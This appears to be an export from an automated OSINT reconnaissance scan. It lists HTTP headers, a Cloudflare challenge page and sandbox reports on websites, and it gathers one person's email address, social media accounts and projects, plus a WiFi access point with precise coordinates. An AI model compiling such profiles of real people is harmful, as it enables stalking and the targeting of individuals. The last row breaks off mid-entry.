| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | W4B3PQ^00ZT00)>&0//44F6/%&_+(*01 (Net ID: 00:06:66:2A:52:3A) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:01 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | wr2435@it.jgec.ac.in | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://wasimreja.me/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e74_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e74_IESQMMUTEX_0_519"\n "IsoScope_e74_ConnHashTable<3700>_HashTable_Mutex"\n "IsoScope_e74_IESQMMUTEX_0_331"\n "IsoScope_e74_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3700"\n "IsoScope_e74_IE_EarlyTabStart_0xd58_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3700"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "142.250.189.202:443"\n "104.18.28.243:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"fonts.googleapis.com"\n "unicons.iconscout.com"\n "wasimreja.me"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<a href="https://www.linkedin.com/in/wasimreja/" target="_blank"" (Indicator: "linkedin.com")\n "<a href="https://twitter.com/_wasimreja" target="_blank" class="home-social-icon">" (Indicator: "twitter")\n "<i class="uil uil-twitter-alt"></i>" (Indicator: "twitter")\n "<i class="uil uil-twitter-alt contact-icon"></i>" (Indicator: "twitter")\n "Twitter" (Indicator: "twitter")\n "<a href="https://twitter.com/_wasimreja" class="footer-social" target="_blank">" (Indicator: "twitter")\n "<a href="https://www.linkedin.com/in/wasimreja/" class="footer-social"" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar41C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar38D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002812]\n "Cab38C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab38C.tmp]- [targetUID: 00000000-00002812]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"favicon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "silence_1_.gif" has type "GIF image data version 89a 500 x 682"- [targetUID: N/A]\n "whats%20cooking_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "music%20player_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "task%20buddy_1_.png" has type "PNG image data 1263 x 700 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar41C.tmp" has type "data"- Location: [%TEMP%\\Tar41C.tmp]- [targetUID: 00000000-00002812]\n "swiper-bundle.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "gcr%20leaderboard_1_.png" has type "PNG image data 1919 x 838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "typing%20speed%20test_1_.png" has type "PNG image data 1920 x 874 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "notes%20mini_1_.png" has type "PNG image data 1920 x 838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002812]\n "sandesh_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=7 orientation=upper-left xresolution=98 yresolution=106 resolutionunit=3 software=Adobe Photoshop CC 2017 (Windows) datetime=2020:06:20 11:34:14] progressive precision 8 1920x850 components 3"- [targetUID: N/A]\n "line_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "quizzler_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1652x805 components 3"- [targetUID: N/A]\n "book%20finder_1_.png" has type "PNG image data 1263 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "dictionary%20app_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "avatar_1_.png" has type "PNG image data 500 x 500 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "urlref_httpswasimreja.me" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "unicons-10_1_.eot" has type "Embedded OpenType (EOT) unicons-10 family"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://wasimreja.me/"\n Pattern match: "https://wasimreja.me"\n Pattern match: "https://swiperjs.com"\n Pattern match: "C.JgU/0$"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "www.microsoft.com0"\n Pattern match: "https://wasimreja.me/assets/img/opengraph.png"\n Pattern match: "https://fonts.googleapis.com"\n Pattern match: "https://fonts.gstatic.com"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&display=swap"\n Pattern match: "https://unicons.iconscout.com/release/v4.0.0/css/line.css"\n Pattern match: "https://www.linkedin.com/in/wasimreja/"\n Pattern match: "https://github.com/wasimreja"\n Pattern match: "https://twitter.com/_wasimreja"\n Pattern match: "https://www.instagram.com/_wasimreja"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "http://www.w3.org/1999/xlink"\n Pattern match: "https://notes-mini.vercel.app/"\n Pattern match: "https://typing-speed-test.onrender.com/"\n Pattern match: "https://gcr-leaderboard.vercel.app/"\n Pattern match: "https://book-finder.onrender.com/"\n Pattern match: "http://whats-cooking.vercel.app/"\n Pattern match: "https://task-buddy.netlify.app/"\n Pattern match: "https://dictionary-app.onrender.com/"\n Pattern match: "https://quizzler.vercel.app/"\n Pattern match: "https://wasimreja.github.io/music-player/"\n Pattern match: "https://github.com/wasimreja/sandesh"\n Heuristic match: "wr2435@it.jgec.ac.in"\n Pattern match: "https://instagram.com/_wasimreja"\n Heuristic match: "fonts.googleapis.com"\n Heuristic match: "unicons.iconscout.com"\n Heuristic match: "wasimreja.me"\n Pattern match: "https://wasimreja.me/Accept-Language"\n Pattern match: "ns.adobe.com/xap/1.0/"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "http://fontello.comIconscoutunicons-13Regularunicons-13unicons-13Version"\n Pattern match: "http://fontello.comIconscoutunicons-12Regularunicons-12unicons-12Version"\n Pattern match: "http://fontello.comIconscoutunicons-0Regularunicons-0unicons-0Version"\n Pattern match: "http |
| 2023-05-12 02:53:39 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache_Hits": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["8A7E:0CB6:1A24B9D:28318AF:645D907B"], "Age": ["151"], "X_Cache_Hits": ["1"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100035-CHI"], "X_Cache": ["HIT"], "X_Timer": ["S1683853586.391035,VS0,VE4"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["b0816cb365cc757f5f8cced0af110244f06dfba5"], "Content_Type": ["text/html; charset=utf-8"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 185.199.108.153 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60715ea2423d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="o9rkiN63h_dC1MXH2ewnO9VeNInpcF4XTtlC3.Ope.M-1683860062-0-AdUguWWDLVlZxsWb6e1bnqomUGdvKH9Hr8OR9XhDVbWy_UNZDFZLD8-BRJaoUzBMnZ4MBtuUzqAf-y1NVIXFBZc2zpThNEMVcsemZ6G3H2y2RdwaGI22EiA1S326BJRlVE4Ae2G6hV1-y96EsTpLgRijeuFFSHz05y1jK0LMHQT6Yul8T61BIXmvzdMkcho4NRYjRqIaGwnrNt3GHyXHuLD9Kg0Z1PswrdZsR5u8cj9YNRG5tPHVjIwdXSU_H7FvumTVKSb2DSCVu7zno--l-x_ursgemNqA1Eu9esEfAcEZErO2ynNNPle4iy35Q-002AvCnrTStuzsV9WenG-kzkwfzH4Bgm9BgZjZ2SzceeiUvpx0VbFQ3pFatklpu5sVBuMECIKb-C35grQD9hIe5CnF2tIuq3LpSjTYWdY_G-taMdpge2EijRLIBI6Kfm3KCKgrmIm-M_kaOkhT6zwNZKrbtrmrwvHusBRZM8mDqXK6BGxQEYolgs9YfSL0l717dfEhPntRoL6ZMAEy83CFiWTndZ1SzKSh5MxSqRh8JYSn7-hlp9tzN-SB8T0mkCkP87rm0gHB2Nc1YNmJH6a6djf3APAwio8E6jQftS4RNyx5lSUUZ_BnFys-ZXFUzYbxVs_s5utzzMkEYOyUrEjMwlbzK1bmHQXnmHfBHDfW-9w0KMV_I2KXURlKdWp_aVGaYPgU9RQpOrOu5jXRwZ5WWo3nXJCoJubmH-xr5xweBUbZG-SrvNgarDFttshord388LcpI4vf_DPi5QAhha2ONgO4nEYcsvGjPWmE5gBNnwndanRmSOkYLNoIKdyVDvafFa_9wxBk6pKwvUGADjN1yYITiFNd4Av6OjiMF0eCD0B-rMcf1K_RyJAW0Q63e569MyoALgsa5LuF6A9Fao0NuRtVokTtKXFjE683wyQoxz2rVadCdcz1SAkPujj4gsPBtzmyTzaZ0eAhZEu4ZktRZ3yW_kCzFaoZlWWXPLmMSYOISs0fLmCihg46UN9oyRLijuEDM_jHg4LTV2TnCzG6rH5ukfU2q3hIf7DNVmpydIO4964Rwd7yky69HogBFyvVcLvLJiau__mlfv9Zd8rpuWQeyviCGIKTRzsIwfkMqNPNyw8X9ilDjYLz8Er-YKFTiBYzKowqSDcLfsInmyu-GY3Q4CRe6azk1q2PDI5jsKPqVXZnDO6xM5WOgDfsUs8jCGX-Y7pnubkolyphepCOCRuJYkPER9RlRKn9TP1Iu5pT3zvM--Qn_g2xND5bfgguBbZ7_xzC6vrG4uq7pRN86Jyn1eh0aJoS1o3moXbGaKVZMFxn9St9eHP_LBzqatvidcntyoQnZyEuvoBGzmB7bxsXvanE_k1kK-flL0DxtFCoSL_hYsi2QdekeHyb0moJOnxYk8nOvpGRVJW2aeFOS6zzQYrTf1ZYVM7iyRgHYPN8uylozJaFR27equ7FqddcsitgcuSFaFlYteDEO4eAuImRVXD5QnWHTDDLK-J-a7cd7n5pHrzsbNbpwPeit55PzKCpzI484EAksVFlNAkrwC4SqRB6KhjvHJRu2SsinDAvuebN5jt7N0scno6aUyjSzxwSSpVf6bZrrSm-p-5sQDUjLp64NRXWVN8wvA3_1f2gF_Vosd3y9Sp0fSOsU2F6EIdZdWuHYetxrmSNE6AHJ3RT_C04YBvG6_Q9PkJsb86B49AEElj23DQaHfl1GA9qGlbppJY5scudrsxneqxrD58hLbvdzxrWwdzLczRciePhFl8OKW5eaSkWmK-s65YIEnBLOSnaXmYwPzvjg8f67iFNC-e3l5m0MDQVx52PRj2vf8DWG_AfPmw2afbxcw9ppplZ9oiixK20YnEv54WswcS_oGpXEwjRNaflmeY-Y06FMexN5UEccQFy7OcRAYdF-UVs7RwoJUdks1JoRoK9OtuCZ-KgdWRayYvkrBZh1irLAwBozTjJSzJVowS3-M9iXqAD-o4GZBMK9eAUQlmuEIIQAf4f1TCN4loJA-4yETDBP4eorxfgJm9hdR63VxYMIHAkqccOTphwj01rk_8nG1uU4rJrScaAyK8AS_kQ2UytoRgp8VoNR_d7rmE_GZgpIDjlZ7mYr5nvR22Zau-p4gmFaOvdsk2jjUaqisfuqgg6D7ilZ29ja7S9UD52x-HqjxmP4JRdKMs3zwtM2aBKs0yMaMXiLr0T0j3f1FktvbG7soBZaonR97fM1qjr28AlqpELx3WuIvTiKLBZ2gxE_Tjenn0-IC2XQdN8IEIXfw9F7jVJZ6FyGJ9Yx4YqJ3kmX0qXi9iX1jb-Y3YZwJ6j4tTSRr8_tAhbW33UaKc3ULwKwGZ9g9Ru0mgnq0hVusSVy31FLGpM6QZZ4iZhokIoEs5L-lSF6-Qt-6-GQgAAhgrRM_mFp17cJjzl0kVV9PTe5Y-EYxGWlJKX7FVEGARcAfwWh_GITW_xYClIpKaR9CMUgzm4MqfOkVCd-6Z7AHBczBYiCIlRejFdx7yIdIPo__-pVcOwTW-jE9Y6Ncj1gf1h">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '12933',
cRay: '7c5f60715ea2423d',
cHash: '4c530bdfb62a335',
cUPMDTk: "\/?__cf_chl_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'TOYbkC9rgCOmr8G89iiZTp2nx3xahTKUWPvvRReOro8JJJL4fq23OOGaFt6uHWiVLv9ABlTzh5akOOr2iBc53fzTOjW4K5sc+Aw6LUirtlJizLJHy/2vFLg/egZuLvz4Jk1sjjx3a/wkUOpJytZhNSfbkgf1KJELFbBUDkPz+PDulg0Nr57X1+oFwk+MMf/JnTKFf63zzoaJCmg1UGm5a8QRiSNvGBM7/i8bWTpF39rRrej+fONG8+Xfj87ptGWoEpG+c7Okgjh50kVvVQ1MM2KNt9Wf0uYN3Y5L83KgO0XjOeom2ZbKiTxcFZ+mcfEnOH7y4gawPSo1rxstuxKlhzZzfeOfN4VyUmxDs0BnYa2jrym4m5FzCmfrBBJJ1wCoAVXGMuoymG/pQ4+/22Y5ByC1Z8p7u74Rp83gpUfEv8bmNvjC33vYku3SIvYOYc5AdNT18IswGxpIjLbRTT8QLo1fadzodr50qCzr5X5Vi06KH6SQu3sOWSfwXNxLiQrSqFvCVjlirKim8KagkYwrflhXda6MuRH8Nh6ZQFP87/eO2YkXCpF9UX1MgEu6CzGx',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
m: 'LwOsDwqRkfr0bjyiLObl7sEK+vITUZuaPQE/A6GDF60=',
i1: 'zy3+9oq0kQS8g0MofYLvVQ==',
i2: 'Pt5t/C6ZQh8wsZRxhTvpYw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60715ea2423d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60715ea2423d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | zhihu (Category: social)
https://www.zhihu.com/people/login | login |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@bigmarker.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 25, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=a85668108cb3&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:3704:120:WilError_01"\n "SM0:3704:304:WilStaging_02"\n "Local\\SM0:3704:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:3704:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.122:443"\n "142.251.2.157:443"\n "151.101.0.176:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "142.251.46.164:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, 